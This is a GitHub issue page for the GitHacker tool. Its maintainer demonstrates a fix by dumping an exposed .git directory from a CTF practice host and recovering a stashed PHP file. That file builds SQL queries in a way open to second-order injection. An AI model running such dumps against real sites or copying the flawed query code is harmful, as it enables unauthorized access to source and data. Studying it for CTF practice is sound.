Comments (2)
Thanks for reporting, I will check it out.
from githacker.
Fixed.
Upgrade to the latest version of GitHacker
pip install -i https://pypi.org/simple/ GitHacker==1.1.3
Exploit the target website
➜ ~ githacker --url "http://0451ba88-a8da-4740-8a6e-8b42a6be9590.node4.buuoj.cn:81/" --output-folder buuoj --delay 0.1
2022-07-26 17:25:57 INFO 1 urls to be exploited
2022-07-26 17:25:57 INFO Exploiting http://0451ba88-a8da-4740-8a6e-8b42a6be9590.node4.buuoj.cn:81/ into buuoj/88f4f5f51e76f7b1b7834ec3e94f100b
2022-07-26 17:25:58 INFO Downloading basic files...
2022-07-26 17:25:58 INFO [17 bytes] 200 .git/COMMIT_EDITMSG
2022-07-26 17:25:58 INFO [73 bytes] 200 .git/description
2022-07-26 17:25:58 ERROR [329 bytes] 404 .git/FETCH_HEAD
2022-07-26 17:25:59 INFO [23 bytes] 200 .git/HEAD
2022-07-26 17:25:59 INFO [145 bytes] 200 .git/index
2022-07-26 17:25:59 INFO [240 bytes] 200 .git/info/exclude
2022-07-26 17:25:59 INFO [168 bytes] 200 .git/logs/HEAD
2022-07-26 17:25:59 ERROR [348 bytes] 404 .git/logs/refs/remotes/origin/HEAD
2022-07-26 17:25:59 INFO [173 bytes] 200 .git/logs/refs/stash
2022-07-26 17:26:00 INFO [41 bytes] 200 .git/ORIG_HEAD
2022-07-26 17:26:00 ERROR [330 bytes] 404 .git/packed-refs
2022-07-26 17:26:00 ERROR [343 bytes] 404 .git/refs/remotes/origin/HEAD
2022-07-26 17:26:00 INFO [41 bytes] 200 .git/refs/stash
2022-07-26 17:26:00 ERROR [342 bytes] 404 .git/objects/info/alternates
2022-07-26 17:26:01 ERROR [347 bytes] 404 .git/objects/info/http-alternates
2022-07-26 17:26:01 ERROR [337 bytes] 404 .git/objects/info/packs
2022-07-26 17:26:01 ERROR [335 bytes] 404 .git/refs/tags/v0.0.1
2022-07-26 17:26:01 ERROR [334 bytes] 404 .git/refs/tags/0.0.1
2022-07-26 17:26:01 ERROR [335 bytes] 404 .git/refs/tags/v1.0.0
2022-07-26 17:26:01 ERROR [334 bytes] 404 .git/refs/tags/1.0.0
2022-07-26 17:26:02 ERROR [340 bytes] 404 .git/logs/refs/heads/daily
2022-07-26 17:26:02 ERROR [338 bytes] 404 .git/logs/refs/heads/dev
2022-07-26 17:26:02 ERROR [342 bytes] 404 .git/logs/refs/heads/feature
2022-07-26 17:26:02 ERROR [339 bytes] 404 .git/logs/refs/heads/feat
2022-07-26 17:26:02 ERROR [338 bytes] 404 .git/logs/refs/heads/fix
2022-07-26 17:26:03 ERROR [341 bytes] 404 .git/logs/refs/heads/hotfix
2022-07-26 17:26:03 ERROR [340 bytes] 404 .git/logs/refs/heads/issue
2022-07-26 17:26:03 ERROR [339 bytes] 404 .git/logs/refs/heads/main
2022-07-26 17:26:03 INFO [168 bytes] 200 .git/logs/refs/heads/master
2022-07-26 17:26:03 ERROR [337 bytes] 404 .git/logs/refs/heads/ng
2022-07-26 17:26:03 ERROR [343 bytes] 404 .git/logs/refs/heads/quickfix
2022-07-26 17:26:04 ERROR [342 bytes] 404 .git/logs/refs/heads/release
2022-07-26 17:26:04 ERROR [339 bytes] 404 .git/logs/refs/heads/test
2022-07-26 17:26:04 ERROR [342 bytes] 404 .git/logs/refs/heads/testing
2022-07-26 17:26:04 ERROR [338 bytes] 404 .git/logs/refs/heads/wip
2022-07-26 17:26:04 ERROR [349 bytes] 404 .git/logs/refs/remotes/origin/daily
2022-07-26 17:26:05 ERROR [347 bytes] 404 .git/logs/refs/remotes/origin/dev
2022-07-26 17:26:05 ERROR [351 bytes] 404 .git/logs/refs/remotes/origin/feature
2022-07-26 17:26:05 ERROR [348 bytes] 404 .git/logs/refs/remotes/origin/feat
2022-07-26 17:26:05 ERROR [347 bytes] 404 .git/logs/refs/remotes/origin/fix
2022-07-26 17:26:05 ERROR [350 bytes] 404 .git/logs/refs/remotes/origin/hotfix
2022-07-26 17:26:06 ERROR [349 bytes] 404 .git/logs/refs/remotes/origin/issue
2022-07-26 17:26:06 ERROR [348 bytes] 404 .git/logs/refs/remotes/origin/main
2022-07-26 17:26:06 ERROR [350 bytes] 404 .git/logs/refs/remotes/origin/master
2022-07-26 17:26:06 ERROR [346 bytes] 404 .git/logs/refs/remotes/origin/ng
2022-07-26 17:26:06 ERROR [352 bytes] 404 .git/logs/refs/remotes/origin/quickfix
2022-07-26 17:26:06 ERROR [351 bytes] 404 .git/logs/refs/remotes/origin/release
2022-07-26 17:26:07 ERROR [348 bytes] 404 .git/logs/refs/remotes/origin/test
2022-07-26 17:26:07 ERROR [351 bytes] 404 .git/logs/refs/remotes/origin/testing
2022-07-26 17:26:07 ERROR [347 bytes] 404 .git/logs/refs/remotes/origin/wip
2022-07-26 17:26:07 ERROR [344 bytes] 404 .git/refs/remotes/origin/daily
2022-07-26 17:26:07 ERROR [342 bytes] 404 .git/refs/remotes/origin/dev
2022-07-26 17:26:08 ERROR [346 bytes] 404 .git/refs/remotes/origin/feature
2022-07-26 17:26:08 ERROR [343 bytes] 404 .git/refs/remotes/origin/feat
2022-07-26 17:26:08 ERROR [342 bytes] 404 .git/refs/remotes/origin/fix
2022-07-26 17:26:08 ERROR [345 bytes] 404 .git/refs/remotes/origin/hotfix
2022-07-26 17:26:08 ERROR [344 bytes] 404 .git/refs/remotes/origin/issue
2022-07-26 17:26:08 ERROR [343 bytes] 404 .git/refs/remotes/origin/main
2022-07-26 17:26:09 ERROR [345 bytes] 404 .git/refs/remotes/origin/master
2022-07-26 17:26:09 ERROR [341 bytes] 404 .git/refs/remotes/origin/ng
2022-07-26 17:26:09 ERROR [347 bytes] 404 .git/refs/remotes/origin/quickfix
2022-07-26 17:26:09 ERROR [346 bytes] 404 .git/refs/remotes/origin/release
2022-07-26 17:26:09 ERROR [343 bytes] 404 .git/refs/remotes/origin/test
2022-07-26 17:26:10 ERROR [346 bytes] 404 .git/refs/remotes/origin/testing
2022-07-26 17:26:10 ERROR [342 bytes] 404 .git/refs/remotes/origin/wip
2022-07-26 17:26:10 ERROR [335 bytes] 404 .git/refs/heads/daily
2022-07-26 17:26:10 ERROR [333 bytes] 404 .git/refs/heads/dev
2022-07-26 17:26:10 ERROR [337 bytes] 404 .git/refs/heads/feature
2022-07-26 17:26:10 ERROR [334 bytes] 404 .git/refs/heads/feat
2022-07-26 17:26:11 ERROR [333 bytes] 404 .git/refs/heads/fix
2022-07-26 17:26:11 ERROR [336 bytes] 404 .git/refs/heads/hotfix
2022-07-26 17:26:11 ERROR [335 bytes] 404 .git/refs/heads/issue
2022-07-26 17:26:11 ERROR [334 bytes] 404 .git/refs/heads/main
2022-07-26 17:26:11 INFO [41 bytes] 200 .git/refs/heads/master
2022-07-26 17:26:12 ERROR [332 bytes] 404 .git/refs/heads/ng
2022-07-26 17:26:12 ERROR [338 bytes] 404 .git/refs/heads/quickfix
2022-07-26 17:26:12 ERROR [337 bytes] 404 .git/refs/heads/release
2022-07-26 17:26:12 ERROR [334 bytes] 404 .git/refs/heads/test
2022-07-26 17:26:12 ERROR [337 bytes] 404 .git/refs/heads/testing
2022-07-26 17:26:12 ERROR [333 bytes] 404 .git/refs/heads/wip
2022-07-26 17:26:13 ERROR /tmp/tmpxhlo_6e0/.git/config is potential dangerous, skip downloading this file
2022-07-26 17:26:13 ERROR [-1 bytes] -1 .git/config
2022-07-26 17:26:13 ERROR /tmp/tmpxhlo_6e0/.git/hooks/applypatch-msg is potential dangerous, skip downloading this file
2022-07-26 17:26:13 ERROR [-1 bytes] -1 .git/hooks/applypatch-msg
2022-07-26 17:26:13 ERROR /tmp/tmpxhlo_6e0/.git/hooks/commit-msg is potential dangerous, skip downloading this file
2022-07-26 17:26:13 ERROR [-1 bytes] -1 .git/hooks/commit-msg
2022-07-26 17:26:13 ERROR /tmp/tmpxhlo_6e0/.git/hooks/fsmonitor-watchman is potential dangerous, skip downloading this file
2022-07-26 17:26:13 ERROR [-1 bytes] -1 .git/hooks/fsmonitor-watchman
2022-07-26 17:26:13 ERROR /tmp/tmpxhlo_6e0/.git/hooks/post-update is potential dangerous, skip downloading this file
2022-07-26 17:26:13 ERROR [-1 bytes] -1 .git/hooks/post-update
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-applypatch is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-applypatch
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-commit is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-commit
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-merge-commit is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-merge-commit
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-push is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-push
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-rebase is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-rebase
2022-07-26 17:26:14 ERROR /tmp/tmpxhlo_6e0/.git/hooks/pre-receive is potential dangerous, skip downloading this file
2022-07-26 17:26:14 ERROR [-1 bytes] -1 .git/hooks/pre-receive
2022-07-26 17:26:15 ERROR /tmp/tmpxhlo_6e0/.git/hooks/prepare-commit-msg is potential dangerous, skip downloading this file
2022-07-26 17:26:15 ERROR [-1 bytes] -1 .git/hooks/prepare-commit-msg
2022-07-26 17:26:15 ERROR /tmp/tmpxhlo_6e0/.git/hooks/update is potential dangerous, skip downloading this file
2022-07-26 17:26:15 ERROR [-1 bytes] -1 .git/hooks/update
2022-07-26 17:26:15 INFO Downloading head files...
2022-07-26 17:26:15 INFO [130 bytes] 200 .git/objects/bf/bdf218902476c5c6164beedd8d2fcf593ea23b
2022-07-26 17:26:15 INFO Downloading blob files...
2022-07-26 17:26:15 INFO [217 bytes] 200 .git/objects/56/dfc20e665f434b97f34ff4dc85782ae93cf1a4
2022-07-26 17:26:15 INFO Running git fsck files...
2022-07-26 17:26:15 INFO [57 bytes] 200 .git/objects/2a/d429743f51d38f0d2cf9540ba22720cc6b2f2b
2022-07-26 17:26:16 INFO [205 bytes] 200 .git/objects/e5/b2a2443c2b6d395d06960123142bc91123148c
2022-07-26 17:26:16 INFO [56 bytes] 200 .git/objects/76/9905f5a6f425ce62ed9a1cbf375a61fb56b406
2022-07-26 17:26:16 INFO [178 bytes] 200 .git/objects/55/56e3ad3f21a0cf5938e26985a04ce3aa73faaf
2022-07-26 17:26:16 INFO [468 bytes] 200 .git/objects/8e/f569f235780f24c42b60f50d528a03f7238c80
2022-07-26 17:26:16 INFO Cloning downloaded repo from /tmp/tmpxhlo_6e0 to buuoj/88f4f5f51e76f7b1b7834ec3e94f100b
2022-07-26 17:26:16 ERROR Cloning into 'buuoj/88f4f5f51e76f7b1b7834ec3e94f100b'...
done.
2022-07-26 17:26:16 INFO Check it out: buuoj/88f4f5f51e76f7b1b7834ec3e94f100b
2022-07-26 17:26:16 INFO 1 / 1 were exploited successfully
2022-07-26 17:26:16 INFO http://0451ba88-a8da-4740-8a6e-8b42a6be9590.node4.buuoj.cn:81/ -> buuoj/88f4f5f51e76f7b1b7834ec3e94f100b
➜ ~ cd buuoj/88f4f5f51e76f7b1b7834ec3e94f100b
➜ 88f4f5f51e76f7b1b7834ec3e94f100b git:(master) git stash list | tee
stash@{0}: WIP on master: bfbdf21 add write_do.php
➜ 88f4f5f51e76f7b1b7834ec3e94f100b git:(master) git stash apply
On branch master
Your branch is up to date with 'origin/master'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: write_do.php
no changes added to commit (use "git add" and/or "git commit -a")
➜ 88f4f5f51e76f7b1b7834ec3e94f100b git:(master) ✗ git diff | tee
diff --git a/write_do.php b/write_do.php
index 56dfc20..8ef569f 100755
--- a/write_do.php
+++ b/write_do.php
@@ -9,8 +9,31 @@ if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
+ $category = addslashes($_POST['category']);
+ $title = addslashes($_POST['title']);
+ $content = addslashes($_POST['content']);
+ $sql = "insert into board
+ set category = '$category',
+ title = '$title',
+ content = '$content'";
+ $result = mysql_query($sql);
+ header("Location: ./index.php");
break;
case 'comment':
+ $bo_id = addslashes($_POST['bo_id']);
+ $sql = "select category from board where id='$bo_id'";
+ $result = mysql_query($sql);
+ $num = mysql_num_rows($result);
+ if($num>0){
+ $category = mysql_fetch_array($result)['category'];
+ $content = addslashes($_POST['content']);
+ $sql = "insert into comment
+ set category = '$category',
+ content = '$content',
+ bo_id = '$bo_id'";
+ $result = mysql_query($sql);
+ }
+ header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
from githacker.
Related Issues (20)
- 未找到命令 HOT 8
- 如何在 docker 中找回进程 HOT 11
- Support git pack file HOT 1
- UnicodeDecodeError: 'utf-8' codec can't decode HOT 5
- Disable SSLCertVerification? HOT 7
- python: can't open file 'GitHacker.py': [Errno 2] No such file or directory HOT 2
- 当前分支若不为master将出现错误、多分支不会全部被克隆 HOT 2
- 在win10中无法在创建文件夹 HOT 2
- Support exploiting multiple urls HOT 1
- Vulnerabilities reported by Justin Steven
- git log -relog 版本不全 HOT 6
- Infinit downloading 404 files (Deny of Service) HOT 2
- Why does not work? HOT 8
- IsADirectoryError: [Errno 21] Is a directory: '/tmp/tmpqouh7cck/.git/objects/pack' HOT 2
- AssertionError: Invalid index file header: b'cons' HOT 2
- Git-dumper and dvcs-ripper appears twice on readme HOT 4
- more ERROR ERROR FileExistsError(17, 'File exists')
- No such file or directory HOT 6
- error after success message HOT 12
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from githacker.